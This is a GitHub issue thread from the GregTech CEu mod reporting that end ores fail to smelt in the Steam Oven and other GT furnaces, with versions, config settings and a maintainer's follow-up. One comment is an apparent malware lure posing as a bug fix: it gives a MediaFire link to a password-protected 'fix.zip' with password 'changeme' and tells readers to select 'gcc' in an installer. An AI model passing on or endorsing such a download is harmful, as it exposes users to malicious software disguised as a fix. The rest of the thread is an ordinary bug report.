### ISSUE TITLE
Steam Oven doesn't smelt ores

### ISSUE THREAD

**Issue by MatthiasMann** [GregTechCEu/GregTechCEu-1.19#1839]
### Checked for existing issues

- [X] I have checked for existing issues, and have found none.

### Tested latest version

- [X] I have checked that this occurs on the latest version.

### GregTech CEu Version

gtceu-1.20.1-1.4.0-build_1032-SNAPSHOT

### Minecraft Version

1.20.1

### Recipe Viewer Installed

EMI

### Environment

Singleplayer

### Cross-Mod Interaction

No

### Other Installed Mods

Modpack based on Sky Greg

### Expected Behavior

end coal ore and end iron ore should be smeltable like shown in the recipe viewer (both when looking up the steam oven, or the ore)

### Actual Behavior

putting in 1, 8 or 64 end iron/coal ore will not start the smelting process - the steam oven is formed, not on/over a chunk edge and the steam input hatch is full. iron ingots are smelted without issues into wrought iron.

these ores are smeltable in a vanilla furnace without issues and produce 2 ingots / 4 coal as shown in JEI/EMI.

NOTE: the iron ingot -> wrought iron is added by kubejs:
```event.smelting('gtceu:wrought_iron_ingot', 'minecraft:iron_ingot')```

### Steps to Reproduce

1. build steam oven
2. fill steam hatch
3. put end iron/coal ore into the input bus

### Additional Information

I looked at the code and it doesn't seem that it's related to a config option - but these are some config options which may be related:
disableManualCompression: true
harderBrickRecipes: true
nerfWoodCrafting: true
hardWoodRecipes: true
hardIronRecipes: true
hardRedstoneRecipes: true
hardToolArmorRecipes: true
hardMiscRecipes: true
hardGlassRecipes: true
nerfPaperCrafting: true
hardAdvancedIronRecipes: true
harderCharcoalRecipe: true
flintAndSteelRequireSteel: true
removeVanillaBlockRecipes: true
removeVanillaTNTRecipe: true

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by krossgg** [comment]
This issue seems to go a lot deeper than it initially appears. It looks like any [generated smelting recipe](https://github.com/GregTechCEu/GregTech-Modern/blob/16ee7ed51dfcb7ef9788ce009018ff785bbab806/src/main/java/com/gregtechceu/gtceu/data/recipe/generated/OreRecipeHandler.java#L133) works in a regular furnace but not in any GT furnaces (steam oven, electric furnace, multi smelter). Needs further testing.
